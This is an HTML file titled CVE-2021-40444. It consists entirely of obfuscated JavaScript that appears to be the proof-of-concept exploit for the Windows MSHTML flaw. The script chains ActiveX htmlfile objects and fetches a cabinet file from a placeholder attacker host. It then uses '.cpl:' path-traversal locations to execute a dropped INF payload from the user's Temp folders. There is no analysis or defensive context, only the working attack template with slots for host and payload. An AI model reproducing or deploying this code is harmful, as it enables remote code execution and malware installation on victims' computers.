<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="Expires" content="-1"> <meta http-equiv="X-UA-Compatible" content="IE=11"> <title>CVE-2021-40444</title> </head> <body> <script> 'use strict'; /** @type {!Array} */ var tokensArray = ["123", "365952KMsRQT", "tiveX", "/Lo", "./../../", "contentDocument", "ppD", "Dat", "close", "Acti", "removeChild", "mlF", "write", "./A", "ata/", "ile", "../", "body", "setAttribute", "#version=5,0,0,0", "ssi", "iframe", "748708rfmUTk", "documentElement", "lFile", "location", "159708hBVRtu", "a/Lo", "Script", "document", "call", "contentWindow", "emp", "Document", "Obj", "prototype", "lfi", "bject", "send", "appendChild", "Low/<INF_CHANGE_HERE>", "htmlfile", "115924pLbIpw", "GET", "p/<INF_CHANGE_HERE>", "1109sMoXXX", "./../A", "htm", "l/T", "cal/", "1wzQpCO", "ect", "w/<INF_CHANGE_HERE>", "522415dmiRUA", "<HOST_CHANGE_HERE>", "88320wWglcB", "XMLHttpRequest", "<INF_CHANGE_HERE>", "Act", "D:edbc374c-5730-432a-b5b8-de94f0b57217", "open", "<bo", "HTMLElement", "/..", "veXO", "102FePAWC"]; /** * @param {number} totalExpectedResults * @param {?} entrySelector * @return {?} */ function getValue(totalExpectedResults, entrySelector) { return getValue = function(state, value) { /** @type {number} */ state = state - 170; var processorState = tokensArray[state]; return processorState; }, getValue(totalExpectedResults, entrySelector); } (function(data, oldPassword) { /** @type {function(number, ?): ?} */ var toMonths = getValue; for (; !![];) { try { /** @type {number} */ var userPsd = parseInt(toMonths(206)) + parseInt(toMonths(216)) * parseInt(toMonths(196)) + parseInt(toMonths(201)) * -parseInt(toMonths(173)) + parseInt(toMonths(177)) + parseInt(toMonths(204)) + -parseInt(toMonths(193)) + parseInt(toMonths(218)); if (userPsd === oldPassword) { break; } else { data["push"](data["shift"]()); } } catch (_0x34af1e) { data["push"](data["shift"]()); } } })(tokensArray, 384881), function() { /** * @return {?} */ function token_dash_lineno() { /** @type {function(number, ?): ?} */ var addedRelations = currentRelations; return addedRelations(205); } /** @type {function(number, ?): ?} */ var currentRelations = getValue; /** @type {!Window} */ var global = window; var document = global["document"]; var then = global["Document"]["prototype"]["createElement"]; var writeFunction = global["Document"]["prototype"]["write"]; var PL$22 = global["HTMLElement"]["prototype"]["appendChild"]; var $ = global["HTMLElement"]["prototype"]["removeChild"]; var el = then["call"](document, "iframe"); try { PL$22["call"](document["body"], el); } catch (_0x1ab454) { PL$22["call"](document["documentElement"], el); } var ACTIVEX = el["contentWindow"]["ActiveXObject"]; var model = new ACTIVEX("htmlfile"); el["contentDocument"]["open"]()["close"](); /** @type {string} */ var colname = "p"; try { $["call"](document["body"], el); } catch (_0x3b004e) { $["call"](document["documentElement"], el); } model["open"]()["close"](); var ops = new model["Script"]["Act" + "iveX" + "Obj" + "ect"]("htmlFile"); ops["open"]()["close"](); /** @type {string} */ var _ = "c"; var TokenType = new ops["Script"]["Ac" + "tiveX" + "Object"]("htmlFile"); TokenType["open"]()["close"](); var view = new TokenType["Script"]["Acti" + "veXO" + "bject"]("htmlFile"); view["open"]()["close"](); var iedom = new ActiveXObject("htmlfile"); var rp_test = new ActiveXObject("htmlfile"); var htmlfile = new ActiveXObject("htmlfile"); var fake = new ActiveXObject("htmlfile"); var doc = new ActiveXObject("htmlfile"); var a = new ActiveXObject("htmlfile"); var Object = global["XMLHttpRequest"]; var args = new Object; var ast = Object["prototype"]["open"]; var callbacks = Object["prototype"]["send"]; var modelIns = global["setTimeout"]; ast["call"](args, "GET", token_dash_lineno(), ![]); callbacks["call"](args); view["Script"]["document"]["write"]("<body>"); var s = then["call"](view["Script"]["document"], "object"); s["setAttribute"]("codebase", token_dash_lineno() + "#version=5,0,0,0"); /** @type {string} */ var i = "l"; s["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217"); PL$22["call"](view["Script"]["document"]["body"], s); /** @type {string} */ iedom["Script"]["location"] = ".cpl" + ":123"; /** @type {string} */ iedom["Script"]["location"] = ".cpl" + ":123"; /** @type {string} */ iedom["Script"]["location"] = ".cpl" + ":123"; /** @type {string} */ iedom["Script"]["location"] = ".cpl" + ":123"; /** @type {string} */ iedom["Script"]["location"] = ".cpl" + ":123"; /** @type {string} */ iedom["Script"]["location"] = ".cpl" + ":123"; /** @type {string} */ iedom["Script"]["location"] = ".cpl" + ":123"; /** @type {string} */ iedom["Script"]["location"] = ".cpl" + ":123"; /** @type {string} */ iedom["Script"]["location"] = ".cpl" + ":123"; /** @type {string} */ iedom["Script"]["location"] = ".cpl" + ":../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>"; /** @type {string} */ rp_test["Script"]["location"] = ".cpl" + ":../../../AppData/Local/Temp/<INF_CHANGE_HERE>"; /** @type {string} */ htmlfile["Script"]["location"] = ".cpl" + ":../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>"; /** @type {string} */ fake["Script"]["location"] = ".cpl" + ":../../../../AppData/Local/Temp/<INF_CHANGE_HERE>"; /** @type {string} */ doc["Script"]["location"] = ".cpl" + ":../../../../../Temp/Low/<INF_CHANGE_HERE>"; /** @type {string} */ fake["Script"]["location"] = ".cpl" + ":../../../../../Temp/<INF_CHANGE_HERE>"; /** @type {string} */ fake["Script"]["location"] = ".cpl" + ":../../Low/<INF_CHANGE_HERE>"; /** @type {string} */ fake["Script"]["location"] = ".cpl" + ":../../<INF_CHANGE_HERE>"; }(); </script> </body> </html>